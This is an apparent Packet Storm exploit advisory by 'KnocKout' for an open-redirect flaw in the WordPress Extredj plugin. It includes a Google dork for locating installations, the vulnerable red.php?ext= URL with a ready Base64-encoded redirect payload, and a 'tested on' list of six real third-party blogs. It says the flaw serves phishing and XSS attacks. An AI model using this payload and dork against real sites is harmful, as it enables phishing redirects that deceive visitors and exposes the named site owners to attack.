WordPress Extredj plugin suffers from an open redirection vulnerability.
15595b2373ac15d55bf51737dbc7d7ee9227d6c5b08e77e62d0bbe2bde8c3ddc _ __ ___ (_) |_ __/ _ \ / _ \ _ __ _ __ ___
| '_ ` _ \| | \ \ /\ / / | | | | | | '__| '_ ` _ \
| | | | | | | |\ V V /| |_| | |_| | | | | | | | |
|_| |_| |_|_|_| \_/\_/ \___/ \___/|_| |_| |_| |_|
Wordpress (Extredj Plugin) - Open Redirect Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Skype : knockoutr@msn.com
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Greetz : b3mb4m, ZoRLu, Sen Haxor, Ne0-h4ck3r, KedAns-Dz ( milw00rm.com )
===================================================================
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Wordpress
|~Plugin : Extredj
|~Affected Version : ALL
|~Software : https://pluginu.com/extredj/
|~RISK : Medium
|~Google Dork : inurl:/wp-content/plugins/extredj
===================================================================
======================Info=========================================
danger, remained on the offensive creativity,
It can be worked out for phishing and XSS attacks.
=====================Exploitation=================================================
http://[TARGET]/wp-content/plugins/extredj/red.php?ext= Base64 encoded URL.
Example : http://[TARGET]/wp-content/plugins/extredj/red.php?ext=aHR0cDovL21pbHcwMHJtLmNvbQ==
=====================Tested on====================================================
http://trendsblog.ru
http://gamingblog.ru
http://polblog.ru
http://murketolog.ru
http://marketblog.ru
http://bikingblog.ru/
===================================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed